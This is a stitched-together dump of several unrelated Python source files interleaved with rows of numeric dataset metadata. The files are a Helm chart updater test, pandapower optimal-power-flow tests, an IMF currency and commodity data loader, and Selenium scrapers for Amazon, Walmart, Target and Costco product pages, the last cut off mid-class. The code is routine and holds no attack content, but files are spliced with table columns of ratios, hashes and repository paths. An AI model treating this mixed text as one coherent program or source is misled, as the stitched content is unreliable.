updater = Updater(Git(empty_git_repo, git_path="deploy/"), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
assert re.search(INITIAL_COMMIT_RE, _last_commit())
def test_chart_updated_manifest_inside_path(empty_git_repo, requests_mock):
mkdir("deploy")
_add_manifest(MANIFEST_WITH_GLOB_PATTERN, path="deploy/helmrelease.yaml")
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo, git_path="deploy/"), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert (
_get_manifest("deploy/helmrelease.yaml") == UPDATED_MANIFEST_WITH_GLOB_PATTERN
)
assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())
def test_does_not_crash_for_multidoc(empty_git_repo, requests_mock):
mkdir("deploy")
_add_manifest(MANIFEST_WITH_MULTIPLE_DOCUMENTS, path="deploy/1-multi.yaml")
_add_manifest(MANIFEST_WITH_SINGLE_IMAGE, path="deploy/2-helmrelease.yaml")
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest("deploy/1-multi.yaml") == MANIFEST_WITH_MULTIPLE_DOCUMENTS
assert (
_get_manifest("deploy/2-helmrelease.yaml") == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
)
assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())
def test_does_not_crash_for_empty_annotation(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_EMPTY, path="1-empty.yaml")
_add_manifest(MANIFEST_WITH_SINGLE_IMAGE, path="2-helmrelease.yaml")
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest("1-empty.yaml") == MANIFEST_EMPTY
assert _get_manifest("2-helmrelease.yaml") == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())
def test_chart_updated_flux2(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_FLUX2)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_FLUX2
assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())
def test_chart_no_relevant_annotations(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_NO_RELEVANT_ANNOTATIONS)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_NO_RELEVANT_ANNOTATIONS
def _add_manifest(content: str, path: str = MANIFEST_PATH) -> None:
with open(path, "w") as f:
f.write(content)
run(["git", "add", path])
def _init_commit():
run(["git", "commit", "-m", "Init"])
run(["git", "checkout", "-b", "test"])
def _last_commit():
run(["git", "checkout", "master"])
return run(["git", "show", "HEAD"], stdout=PIPE, text=True, check=True).stdout
def _get_manifest(path: str = MANIFEST_PATH):
with open(path, "r") as f:
return f.read()
| 26.60989
| 88
| 0.736114
| 2,053
| 14,529
| 4.884559
| 0.075986
| 0.046669
| 0.035899
| 0.045772
| 0.866972
| 0.843139
| 0.818508
| 0.802553
| 0.772138
| 0.741623
| 0
| 0.025334
| 0.149632
| 14,529
| 545
| 89
| 26.658716
| 0.786321
| 0
| 0
| 0.733925
| 0
| 0.004435
| 0.413105
| 0.091954
| 0
| 0
| 0
| 0
| 0.068736
| 1
| 0.042129
| false
| 0
| 0.013304
| 0
| 0.059867
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f921e9429d83ea39bff31bb458872fdae5f55af4
| 47
|
py
|
Python
|
src/beehive/data/__init__.py
|
i-pan/kaggle-rsna-pe
|
81ca9ee45014b7ef1647000492a4ef5fbad7126f
|
[
"Apache-2.0"
] | 17
|
2020-11-03T21:08:44.000Z
|
2021-09-17T10:54:55.000Z
|
src/beehive/data/__init__.py
|
i-pan/honeycomb
|
1f5f8c6c37f2a66b3109412e803994a9dc6ad10d
|
[
"MIT"
] | 1
|
2020-03-04T15:47:52.000Z
|
2020-03-04T15:47:52.000Z
|
src/beehive/data/__init__.py
|
i-pan/kaggle-rsna-pe
|
81ca9ee45014b7ef1647000492a4ef5fbad7126f
|
[
"Apache-2.0"
] | 6
|
2020-11-21T18:01:23.000Z
|
2022-03-05T05:32:41.000Z
|
from . import datasets
from . import transforms
| 23.5
| 24
| 0.808511
| 6
| 47
| 6.333333
| 0.666667
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 47
| 2
| 24
| 23.5
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
006f3756b91a45c4095cdacefc62c63ccb6e94b4
| 14,338
|
py
|
Python
|
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
import pytest
try:
import pplog as logging
except:
import logging
logger = logging.getLogger(__name__)
def test_simplest_voltage():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=100)
pp.create_ext_grid(net, 0)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_ext_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_eg_voltage():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50)
pp.create_ext_grid(net, 0, vm_pu=1.01)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_ext_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert net.res_bus.vm_pu.at[0] == net.ext_grid.vm_pu.values
assert net.OPF_converged
def test_simplest_dispatch():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=100)
pp.create_ext_grid(net, 0, cost_per_kw=101)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_est_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_opf_gen_voltage():
""" Testing a simple network with transformer for voltage
constraints with OPF using a generator """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# ceate net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=200)
pp.create_gen(net, 3, p_kw=-10, controllable=True, max_p_kw=-25, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw = -100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100000)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100000)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_opf_gen_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert min(net.res_bus.vm_pu) > vm_min
assert net.OPF_converged
def test_opf_sgen_voltage():
""" Testing a simple network with transformer for voltage
constraints with OPF using a static generator """
# boundaries
vm_max = 1.04
vm_min = 0.96
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=1000000)
pp.create_sgen(net, 3, p_kw=-10, controllable=True, max_p_kw=-
15, min_p_kw=-5, max_q_kvar=25, min_q_kvar=-25, cost_per_kw = -100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=1000000)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=1000000)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_sgen_voltage")
logger.debug("res_sgen:\n%s" % net.res_sgen)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_opf_gen_loading():
""" Testing a simple network with transformer for loading
constraints with OPF using a generator """
# wide open voltage boundaries to make sure they don't interfere with loading constraints
vm_max = 1.5
vm_min = 0.5
max_line_loading = 11
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=145)
pp.create_gen(net, 3, p_kw=-10, controllable=True, max_p_kw=-15, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw = -100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_gen_loading")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_line.loading_percent:\n%s" % net.res_line.loading_percent)
assert max(net.res_line.loading_percent) < max_line_loading
logger.debug("res_trafo.loading_percent:\n%s" % net.res_trafo.loading_percent)
assert max(net.res_trafo.loading_percent) < 145
assert net.OPF_converged
def test_opf_sgen_loading():
""" Testing a simple network with transformer for loading
constraints with OPF using a generator """
# boundaries
vm_max = 1.5
vm_min = 0.5
max_trafo_loading = 800
max_line_loading = 13
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75, tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0, vn_hv_kv=10.0,
vscr_percent=2.8125, tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751, sn_kva=16.0,
pfe_kw=0.11, name=None, in_service=True, index=None,
max_loading_percent=max_trafo_loading)
pp.create_sgen(net, 3, p_kw=-10, controllable=True, max_p_kw=-15, min_p_kw=-5, max_q_kvar=25,
min_q_kvar=-25, cost_per_kw = -100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_sgen_loading")
logger.debug("res_sgen:\n%s" % net.res_sgen)
logger.debug("res_line.loading_percent:\n%s" % net.res_line.loading_percent)
assert max(net.res_line.loading_percent) < max_line_loading
logger.debug("res_trafo.loading_percent:\n%s" % net.res_trafo.loading_percent)
assert max(net.res_trafo.loading_percent) < max_trafo_loading
assert net.OPF_converged
#def test_opf_oberrhein():
# """ Testing a simple network with transformer for loading
# constraints with OPF using a generator """
# import pandapower.networks as nw
# # create net
# net = nw.ms_oberrhein_balanced()
## net = nw.ms_oberrhein_radial()
# net.bus["max_vm_pu"]=1.1
# net.bus["min_vm_pu"]=0.9
# net.line["max_loading_percent"]=200
# net.trafo["max_loading_percent"]=100
# net.sgen["max_p_kw"]=-net.sgen.sn_kva
# net.sgen["min_p_kw"]=0
# net.sgen["max_q_kvar"]=1
# net.sgen["min_q_kvar"]=-1
# net.sgen["controllable"] =1
# # run OPF
# pp.runopp(net, verbose=False)
## assert net["OPF_converged"]
if __name__ == "__main__":
""" test for optimal power flow using default cost function "maxp"
"""
# import time
# t = time.time()
pytest.main(["test_opf.py", "-s"])
# elapsed = time.time()-t
logger.setLevel("DEBUG")
# test_simplest_voltage()
# test_simplest_dispatch()
# test_opf_gen_voltage()
# test_opf_sgen_voltage()
# test_opf_gen_loading()
# test_opf_sgen_loading()
# test_eg_voltage()
| 43.448485
| 99
| 0.616474
| 2,328
| 14,338
| 3.460911
| 0.087629
| 0.031774
| 0.03649
| 0.029043
| 0.868189
| 0.856522
| 0.846841
| 0.842994
| 0.834306
| 0.829589
| 0
| 0.065463
| 0.270191
| 14,338
| 330
| 100
| 43.448485
| 0.704511
| 0.155601
| 0
| 0.763285
| 0
| 0
| 0.056727
| 0.018741
| 0
| 0
| 0
| 0
| 0.115942
| 1
| 0.033816
| false
| 0
| 0.019324
| 0
| 0.05314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0084b78aba40e66e766070896b94858bed19f9cc
| 4,306
|
py
|
Python
|
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | 1
|
2021-04-23T21:27:24.000Z
|
2021-04-23T21:27:24.000Z
|
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | null | null | null |
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | null | null | null |
"""
There are currency and commodity data. (origin: https://imf.org)
"""
from qnt.data.common import *
def load_currency_list():
"""
Loads currency list (origin: https://imf.org)
:return:
"""
track_event("DATA_IMF_CURRENCY_LIST")
uri = "imf.org/currency/list"
js = request_with_retry(uri, None)
js = js.decode()
idx = json.loads(js)
return idx
def load_currency_data(
assets: tp.Union[None, tp.List[tp.Union[str,dict]]] = None,
min_date: tp.Union[str, datetime.date, None] = None,
max_date: tp.Union[str, datetime.date, None] = None,
tail: tp.Union[datetime.timedelta, float, int] = DEFAULT_TAIL,
dims: tp.Tuple[str, str, str] = (ds.TIME, ds.ASSET),
forward_order: bool = True,
):
"""
Loads currency timeseries (origin: https://imf.org)
:param assets:
:param min_date:
:param max_date:
:param tail:
:param dims:
:param forward_order:
:return:
"""
track_event("DATA_IMF_CURRENCY_DATA")
max_date = parse_date(max_date)
if min_date is not None:
min_date = parse_date(min_date)
else:
min_date = max_date - parse_tail(tail)
uri = "imf.org/currency/data"
raw = request_with_retry(uri, None)
if raw is None:
arr = xr.DataArray(
[[np.nan]],
dims=[ds.TIME, ds.ASSET],
coords={
ds.TIME: pd.DatetimeIndex([max_date]),
ds.ASSET: ['']
}
)[:,1:]
else:
arr = xr.open_dataarray(raw, cache=True, decode_times=True)
arr = arr.compute()
arr = arr.sel(time=slice(max_date,min_date))
if assets is not None:
arr = arr.broadcast_like(xr.DataArray(assets, dims='asset', coords={'asset':assets}))
arr = arr.sel(asset=assets)
if forward_order:
arr = arr.sel(**{ds.TIME: slice(None, None, -1)})
arr = arr.dropna(ds.TIME, 'all')
arr.name = "imf_currency"
return arr.transpose(*dims)
def load_commodity_list():
"""
Loads commodity list (origin: https://imf.org)
:return:
"""
track_event("DATA_IMF_COMMODITY_LIST")
uri = "imf.org/commodity/list"
js = request_with_retry(uri, None)
js = js.decode()
idx = json.loads(js)
return idx
def load_commodity_data(
assets: tp.Union[None, tp.List[tp.Union[str,dict]]] = None,
min_date: tp.Union[str, datetime.date, None] = None,
max_date: tp.Union[str, datetime.date, None] = None,
tail: tp.Union[datetime.timedelta, float, int] = DEFAULT_TAIL,
dims: tp.Tuple[str, str, str] = (ds.TIME, ds.ASSET),
forward_order: bool = True,
):
"""
Loads commodity timeseries (origin: https://imf.org)
:param assets:
:param min_date:
:param max_date:
:param tail:
:param dims:
:param forward_order:
:return:
"""
track_event("DATA_IMF_COMMODITY_DATA")
max_date = parse_date(max_date)
if min_date is not None:
min_date = parse_date(min_date)
else:
min_date = max_date - parse_tail(tail)
uri = "imf.org/commodity/data"
raw = request_with_retry(uri, None)
if raw is None:
arr = xr.DataArray(
[[np.nan]],
dims=[ds.TIME, ds.ASSET],
coords={
ds.TIME: pd.DatetimeIndex([max_date]),
ds.ASSET: ['']
}
)[:,1:]
else:
arr = xr.open_dataarray(raw, cache=True, decode_times=True)
arr = arr.compute()
arr = arr.sel(time=slice(max_date,min_date))
if assets is not None:
arr = arr.broadcast_like(xr.DataArray(assets, dims='asset', coords={'asset':assets}))
arr = arr.sel(asset=assets)
if forward_order:
arr = arr.sel(**{ds.TIME: slice(None, None, -1)})
arr = arr.dropna(ds.TIME, 'all')
arr.name = "imf_commodity"
return arr.transpose(*dims)
if __name__ == '__main__':
cl = load_currency_list()
print('currency list', json.dumps(cl, indent=1))
cd = load_currency_data(tail=60, assets=['EUR'])
print('currency data', cd.to_pandas())
cl = load_commodity_list()
print('commodity list', json.dumps(cl, indent=1))
cd = load_commodity_data(tail=600, assets=['PSOYB'])
print('commodity data', cd.to_pandas())
| 27.602564
| 93
| 0.597306
| 580
| 4,306
| 4.262069
| 0.162069
| 0.039644
| 0.024272
| 0.034385
| 0.805825
| 0.805825
| 0.792071
| 0.792071
| 0.769417
| 0.769417
| 0
| 0.003442
| 0.25778
| 4,306
| 156
| 94
| 27.602564
| 0.770025
| 0.114491
| 0
| 0.734694
| 0
| 0
| 0.080707
| 0.047826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.010204
| 0
| 0.091837
| 0.040816
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00949a7d12854e717c61c3408e8563d640bd2e89
| 7,133
|
py
|
Python
|
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | null | null | null |
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | 5
|
2021-09-28T19:09:24.000Z
|
2021-09-28T19:17:31.000Z
|
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | 1
|
2021-10-17T01:19:59.000Z
|
2021-10-17T01:19:59.000Z
|
import json
from selenium import webdriver
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
from django.conf import settings
class AmazonScrapper:
"""
Responsible for scrapping amazon data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = None
def parse_page_content(self, soup):
try:
self.product_name = soup.find(id='productTitle').get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', {"id": "priceblock_ourprice"})
if self.product_price:
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
else:
self.product_price = soup.find('span', {"id": "priceblock_dealprice"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"class": "a-icon-alt"}).get_text()
except Exception as e:
self.product_review_score = 'BAD REQUEST'
try:
soup.select('#availability .a-color-state')[0].get_text().strip()
self.product_availability = 'Out of Stock'
except:
self.product_availability = 'Available'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to walmart scrapping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
class WalmartScrapper:
"""
Responsible for scrapping walmart data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = 'Available'
def parse_page_content(self, soup):
try:
self.product_name = soup.find('h1', {"itemprop": "name"}).get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', {"itemprop" : "price"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"class" : "f7 rating-number"}).get_text() + ' out of 5 stars'
except Exception as e:
self.product_review_score = 'BAD REQUEST'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to walmart scrapping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
class TargetScrapper:
"""
Responsible for scrapping Target data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = None
def parse_page_content(self, soup):
try:
self.product_name = soup.find('span', {"itemprop": "name"}).get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('div', {"data-test" : "product-price"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('h2', {"data-test" : "ratingCountText"}).get_text() + ' out of 5 stars'
except Exception as e:
self.product_review_score = 'BAD REQUEST'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Target scrapping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
class CostcoScrapper:
"""
Responsible for scrapping Costco data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = 'Available'
def parse_page_content(self, soup):
try:
self.product_name = soup.find('meta', property="og:description").get('content')
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', class_="op-value").get_text()
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"itemprop": "ratingValue"}).get_text()
except Exception as e:
self.product_review_score = 'BAD REQUEST'
